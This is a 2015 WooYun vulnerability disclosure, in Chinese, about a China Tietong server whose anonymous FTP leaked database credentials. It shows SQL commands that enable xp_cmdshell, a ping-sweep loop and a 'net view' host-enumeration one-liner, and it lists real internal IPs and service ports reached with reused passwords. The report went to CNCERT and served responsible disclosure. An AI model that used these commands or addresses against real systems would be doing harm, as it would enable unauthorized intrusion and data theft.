当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133940

漏洞标题:中国铁通集团某服务器未授权访问可泄漏大量内部信息/多台服务器沦陷/漫游内网

相关厂商:中国铁通集团有限公司

漏洞作者: 路人甲

提交时间:2015-08-15 19:24

修复时间:2015-10-01 14:42

公开时间:2015-10-01 14:42

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-15: 细节已通知厂商并且等待厂商处理中
2015-08-17: 厂商已经确认,细节仅向厂商公开
2015-08-27: 细节向核心白帽子及相关领域专家公开
2015-09-06: 细节向普通白帽子公开
2015-09-16: 细节向实习白帽子公开
2015-10-01: 细节向公众公开

简要描述:

广西河池市铁通-漫游内网

详细说明:

http://61.234.54.111 //打开是腾讯首页/顿时有了精神//广西河池市铁通某服务器


1.png


ftp://61.234.54.111/ //ftp 可匿名访问


11.png


收集信息 - 为进一步测试作铺垫
数据库连接信息:共有多处,这里只列出3处

ftp://61.234.54.111/kaoshi.rar  //考试系统 //jc.config  获得数据库账户信息
ftp://61.234.54.111/MapSystem.rar //地图系统 web.config
ftp://61.234.54.111/迁移.rar // web.config


5.png


4.png


6.png


通过数据库远程连接 - 进一步提取权限 - 内网探测 - 关联信息获取

Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;


Exec master.dbo.xp_cmdshell 'cmd'


数据库连接成功-成功获取系统最高权限-顺利进入远程桌面系统-

7.png


0.png


关于内网渗透-
多个IP

8.png


探测C段在线主机-这里以其中一IP演示-

for /l %i in (1,1,255) do @ping 192.55.8.%i -w 1 -n 1 | find /i "ttl"


12.png


通过网上邻居也可验证可登陆用户- ping 可得到IP

31.png


或者更为直接点的 查找对应IP

FOR /F "eol=- tokens=1 delims=\ " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i "ttl" & echo.)


10.png


简单利用前面获取的数据库密码登陆服务器远程桌面系统
61.234.54.102

2.jpg


61.234.54.114

3.jpg


这台服务器运行着多套内部管理系统

http://61.234.54.114:10087   //投票系统
http://61.234.54.114:10068 //投票系统
http://61.234.54.114:10098
http://61.234.54.114:10080
http://61.234.54.114:3094
http://61.234.54.114:10057 //考核结算系统
http://61.234.54.114:10056 //他网信息管理系统
http://61.234.54.114:10060 //河池铁通在线考试系统
http://61.234.54.114:10050
http://61.234.54.114:10069 //评测系统
http://61.234.54.114:10070 //评测系统
http://61.234.54.114:8001 //铁通故障处理系统
http://61.234.54.114:10051 //企业信息管理系统
http://61.234.54.114:10078 //铁通箱体搜索系统


61.234.54.117

41.png


监控服务器 太卡了。。只上一张图看看

42.png


43.png


61.234.54.126

51.png


61.234.54.119

21.png


62.png


61.png


暂时就这么多吧,因只手工操作,其他网段的不继续探测。
如果上个工具自动化。。那么整个内网将沦陷不少服务器。。
数据库信息方面比较敏感,未深入。具体泄漏未统计。

漏洞证明:

见上方详细说明


修复方案:

http://61.234.54.114:10087/test.txt

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-08-17 14:41

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无